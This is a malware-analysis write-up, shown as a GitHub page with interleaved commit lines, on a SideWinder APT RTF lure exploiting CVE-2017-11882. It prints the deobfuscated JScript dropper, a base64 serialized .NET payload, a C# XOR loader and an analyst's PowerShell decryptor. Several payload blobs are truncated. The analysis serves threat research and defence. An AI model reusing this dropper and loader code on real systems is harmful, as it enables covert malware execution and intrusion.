ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
cd008c2634
CyberThreatIntel/Indian/APT/SideWinder/25-12-19/analysis.md

296 lines
329 KiB
Markdown
Raw Normal View History

Create analysis.md
2019-12-27 13:09:56 +00:00
# SideWinder same targets, same TTPs, time to counter-attack !
## Table of Contents
* [Malware analysis](#Malware-analysis)
* [Threat Intelligence](#Intel)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [Yara Rules](#Yara)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Knowledge Graph](#Knowledge)
* [Links](#Links)
+ [Original Tweet](#tweet)
+ [Link Anyrun](#Links-Anyrun)
+ [Ressources](#Ressources)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
Update analysis.md
2019-12-27 19:23:58 +00:00
<h6>The initial vector is an RTF file who use an well-know vulnerability (CVE-2017-11882) for execute a js script (1.a) form the package of OLE objects. </h6>
Create analysis.md
2019-12-27 13:09:56 +00:00
<p align="center">
Update analysis.md
2019-12-27 19:23:58 +00:00
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/RTF_objects.PNG">
</p>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/obj1.PNG">
</p>
<h6>We can observe on the code of the exploit that jump and rebuild the command to execute. </h6>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/obj2.PNG">
</p>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/exploit.png">
Create analysis.md
2019-12-27 13:09:56 +00:00
</p>
Update analysis.md
2019-12-27 19:23:58 +00:00
<h6>As first, we can observe that a series of functions are used for obfuscate the criticals parts of the script.</h6>
Update analysis.md
2019-12-27 20:06:15 +00:00
```javascript
var OaXQT = ActiveXObject;
var cRKGlc = String.fromCharCode;
function RDDb(str)
{
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXY"+"Zabcdefghijklmnopqrstuvwxyz0123456789+/="
var b, result = "", r1, r2, i = 0;
for (; i < str.length;)
{
b = b64.indexOf(str.charAt(i++)) << 18 | b64.indexOf(str.charAt(i++)) << 12 |(r1 = b64.indexOf(str.charAt(i++))) << 6 | (r2 = b64.indexOf(str.charAt(i++)));
result += r1 === 64 ? cRKGlc(b >> 16 & 255) : r2 === 64 ? cRKGlc(b >> 16 & 255, b >> 8 & 255) : cRKGlc(b >> 16 & 255, b >> 8 & 255, b & 255);
}
return result;
};
function SJnEuQM (key, bytes)
{
var res = [];
for (var i = 0; i < bytes.length; ) {
for (var j = 0; j < key.length; j++) {
res.push(cRKGlc((bytes.charCodeAt(i)) ^ key.charCodeAt(j)));
i++;
if (i >= bytes.length) {j = key.length;}
}
}
return res.join("")
}
function EvpTXkLe(bsix){ return SJnEuQM(keeee,RDDb(bsix))}
var keeee = SJnEuQM("YjfT",RDDb("altWY2"+"hcV2xq"+"XA=="));
```
<h6>This series of functions perform the decryption of the base64 and xor by a constant encoded key (keeee), this can be merged on one single next function</h6>
```javascript
function EvpTXkLe(bytes)
{
var b,b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",result = "",r1,r2, i = 0,res = [],key ="3107161836";
for (; i < bytes.length;)
{
b = b64.indexOf(bytes.charAt(i++)) << 18 | b64.indexOf(bytes.charAt(i++)) << 12 |(r1 = b64.indexOf(bytes.charAt(i++))) << 6 | (r2 = b64.indexOf(bytes.charAt(i++)));
result += r1 === 64 ? String.fromCharCode(b >> 16) : r2 === 64 ? String.fromCharCode(b >> 16 & 255, b >> 8 & 255) : String.fromCharCode(b >> 16 & 255, b >> 8 & 255, b & 255);
}
for (var i = 0; i < result.length; ) {
for (var j = 0; j < key.length; j++) {
res.push(String.fromCharCode((result.charCodeAt(i)) ^ key.charCodeAt(j)));
i++;
if (i >= result.length) { j = key.length;}
}
}
return res.join("")
}
var data= EvpTXkLe("Data to decrypt")
console.log(data)
```
<h6>The first block inside the try/catch is for initialize theposition of the window outside the display and payload to inject in the process</h6>
```javascript
var mst = null;
var FSO = null;
window.resizeTo(1, 1);
window.moveTo(-1000, -1200);
var shells = new ActiveXObject("WScript.Shell");
var so = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYRAAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAAAAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5YbWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGFwAAAARMb2FkCg8MAAAAACAAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAI8nGXQAAAAAAAAAA4AAiIAsBMAAAGAAAAAYAAAAAAAB2NgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAJDYAAE8AAAAAQAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAAAAAALnRleHQAAAB8FgAAACAAAAAYAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAABAAAAABAAAABoAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAeAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFg2AAAAAAAASAAAAAIABQC0JQAAcBAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAEkAAAAAAAAAAnIBAABwfQIAAAQCchsAAHB9BAAABAJy0AEAcH0FAAAEAnLoAQBwfQYAAAQCclACAHB9BwAABAJyqAIAcH0IAAAEAigOAAAKKgAAABMwAwBGAAAAAQAAEQONEwAAAQpzDwAACgZvEAAACgYoEQAACnICAwBwcgYDAHBvEgAACnIIAwBwcgYDAHBvEgAACnIMAwBwcgYDAHBvEgAACioAABMwBQA8AAAAAgAAEXMTAAAKChYLKyIGAwdvFAAACgIHAm8VAAAKXW8UAAAKYbZvFgAACiYHF9YLBwNvFQAACjLVBm8XAAAKKhMwBQBcAAAAAwAAEQKOaR8g1o0TAAABCigYAAAKHyCNEwAAAQsHbxkAAAoHFgYWHyAoGgAACgIWBh8gAo5pKBoAAAoWDCsZBggfINaPEwAAASVHBggfIF2RYdJSCBfWDAgCjmky4QYqEzAFAFEAAAAAAAAAA28VAAAKLQIEKgRvFQAACi0CAyoDGI0aAAABJRYfL50lFx9cnW8bAAAKEAEEGI0aAAABJRYfL50lFx9cnW8cAAAKEAJyEAMAcAMEKB0AAAoqAAAAGzAFADECAAAEAAARAgJ7BQAABAJ7BgAABCgDAAAGbx4AAAp9BgAABAICewUAAAQCewcAAAQoAwAABm8eAAAKfQcAAAQCAnsFAAAEAnsIAAAEKAMAAAZvHgAACn0IAAAEHyMoHwAACgJ7BgAABCggAAAKCnIgAwBwKCEAAAoLBygiAAAKLQtyRgMAcCghAAAKCwIHAnsCAAAEKCMAAAp9AgAABAYCewIAAAQoJAAACiggAAAKKCUAAAosC3JsAwBwcyYAAAp6ficAAApykAMAcBdvKAAACgJ7CAAABAYCewIAAAQoJAAACiggAAAKbykAAAoGKCoAAAomAhsoAgAABnLsAwBwKCMAAAoMAygrAAAKKAcAAAYNH0YfFHMsAAAKEwQIHxQfIG8tAAAKEwUCCSguAAAKEQRvLwAACiguAAAKEQVvLwAACigJAAAGDQQoKwAACigHAAAGEwYfWCD0AQAAcywAAAoTBwICewcAAAQFKAUAAAYg9AEAAB8gby0AAAoTCAIRBiguAAAKEQdvLwAACiguAAAKEQhvLwAACigJAAAGEwYRBigEAAAGEwYCewIAAAQGAnsCAAAEKCQAAAooIAAAChcoMAAACgZy9gMAcCggAAAKCSgxAAAKBghvHgAACiggAAAKEQYoMQAACgYCewIAAAQoJAAACnIKBABwKCMAAAooIAAACigyAAAKAnsEAAAEby8AAAooMQAACgYCewIAAAQoJAAACiggAAAKKDMAAAom3gMm3gAqAAAAQRwAAAAAAAAAAAAALQIAAC0CAAADAAAADwAAARswBABoAAAABQAAEQJzNAAACgoGFnM1AAAKC3M2AAAKDCAABAAAjRMAAAENKwoICRYRBG83AAAKBwkWCY5pbzgAAAolEwQWMOUIbzkAAAoTBd4eCCwGCG86AAAK3AcsBgdvOgAACtwGLAYGbzoAAArcEQUqASgAAAIAFQAyRwAKAAAAAAIADwBCUQAKAAAAAAIABwBUWwAKAAAAABMwAwA+AAAABgAAERUKFgsWDCsuAwiRBAeRMxQHBI5pF9ozBggH2gorHgcX1
```
<h6>The next block is two functions one used for write the payload at inject and the second for check the version .NET on the system</h6>
Update analysis.md
2019-12-27 19:23:58 +00:00
```javascript
Update analysis.md
2019-12-27 20:06:15 +00:00
function write_payload(b)
{
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
mst = new ActiveXObject("System.IO.MemoryStream");
mst.Write(ba, 0, (length / 4) * 3);
mst.Position = 0;
}
function check_NET_version()
{
var net = "",folder;
var folds = FSO.GetFolder(FSO.GetSpecialFolder(0)+"\Microsoft.NET\Framework\").SubFolders;
e = new Enumerator(folds);
e.moveFirst();
do
{
folder = e.item();
var files = folder.files;
var fileEnum = new Enumerator(files);
fileEnum.moveFirst();
while(fileEnum.atEnd() == false)
{
if(fileEnum.item().Name == "csc.exe")
{
if(folder.Name.substring(0,2) == "v2") {return "v2.0.50727"}
else if(folder.Name.substring(0,2) == "v4") { return "v4.0.30319"}
}
fileEnum["moveNext"]();
}
e["moveNext"]();
}while (e.atEnd() == false)
return folder.Name;
}
Update analysis.md
2019-12-27 19:23:58 +00:00
```
Update analysis.md
2019-12-27 23:00:17 +00:00
<h6>The last block contains the vulnerable legit software and a well-know loader used by Sidewinder, this run the correct version to use in .NET by an dynamicinvoke</h6>
```javascript
ver = "v2.0.50727";
try
{
FSO = new ActiveXObject("Scripting.FileSystemObject");
ver = check_NET_version();
}
catch(e) { ver = "v2.0.50727";}
shells.Environment("Process")("COMPLUS_Version'") = ver;;
write_payload(so);
var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
var al = new ActiveXObject("System.Collections.ArrayList");
var d = fmt["Deserialize_2"](mst);
al.Add(undefined);
var o = d["DynamicInvoke"](al.ToArray())["CreateInstance"]("StInstaller.Program");
var x = "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";
var y = "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
var m = o.Work;
```
<h6>Finally still execute the process with loader and the code to inject by process injection if throws an exception and close the window whatever the result</h6>
```javascript
try
{
try
{
[previous code described]
}
catch (e) {o["Work"](x,y,"202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8");}
finally{window.close();}
```
###### We can note that ``` 202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8 ``` show like an internal reference for the SideWinder group, this is used as identifier in the communications with the C2 for the data sent. The path of the origin directory is encoded in base 64.
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Indian/APT/SideWinder/25-12-19/Pictures/comC2.PNG">
</p>
<h6> On the dotnet loader, we can load an instance from the code extracted by the module. This module use an xor in a loop of the bytes for get the payload to execute. </h6>
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
namespace Module
{
// Token: 0x02000002 RID: 2
public static class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000450
static Program()
{
byte[] array = File.ReadAllBytes(Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "bGy1elg.tmp ".Trim()));
byte[] array2 = new byte[array.Length - 32];
Buffer.BlockCopy(array, 32, array2, 0, array2.Length);
for (int i = 0; i < array2.Length; i++)
{
byte[] array3 = array2;
int num = i;
array3[num] ^= array[i % 32];
}
Program._assembly = Assembly.Load(array2);
}
// Token: 0x06000002 RID: 2 RVA: 0x000020C5 File Offset: 0x000004C5
public static void InitGadgets() { Program.Load(); }
// Token: 0x06000003 RID: 3 RVA: 0x000020CC File Offset: 0x000004CC
public static void FileRipper() { Program.Load(); }
// Token: 0x06000004 RID: 4 RVA: 0x000020D4 File Offset: 0x000004D4
private static void Load()
{
try
{
foreach (Type type in Program._assembly.GetExportedTypes())
{
if (type.Name == "Program")
{
object obj = Activator.CreateInstance(type);
obj.GetType().GetMethod("Start").Invoke(obj, new object[0]);
break;
}
}
}
catch {}
finally { Process.GetCurrentProcess().Kill(); }
}
// Token: 0x04000001 RID: 1
private static readonly Assembly _assembly;
}
}
```
<h6>We can use fire against fire and use Powershell for dercrypt the payload and save it</h6>
```csharp
[byte[]] $array = [System.IO.File]::ReadAllBytes("path tmp file")
# note: this in powershell 5.1 -> CreateInstance else new-object byte[] length for get an empty table of zeros
[byte[]] $array2 = [System.Byte[]]::CreateInstance([System.Byte],$array.length -32)
[System.Buffer]::BlockCopy($array, 32, $array2, 0, $array2.Length)
for ($i = 0; $i -lt $array2.length; $i++)
{
[byte[]] $array3 = $array2
[int] $num = $i
$array3[$num] = $array3[$num] -bxor $array[$i % 32]
}
[System.IO.File]::WriteAllBytes("path to save", $array2)
```
Update analysis.md
2019-12-27 19:23:58 +00:00
Create analysis.md
2019-12-27 13:09:56 +00:00
<h2>Threat Intelligence</h2><a name="Intel"></a></h2>
<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
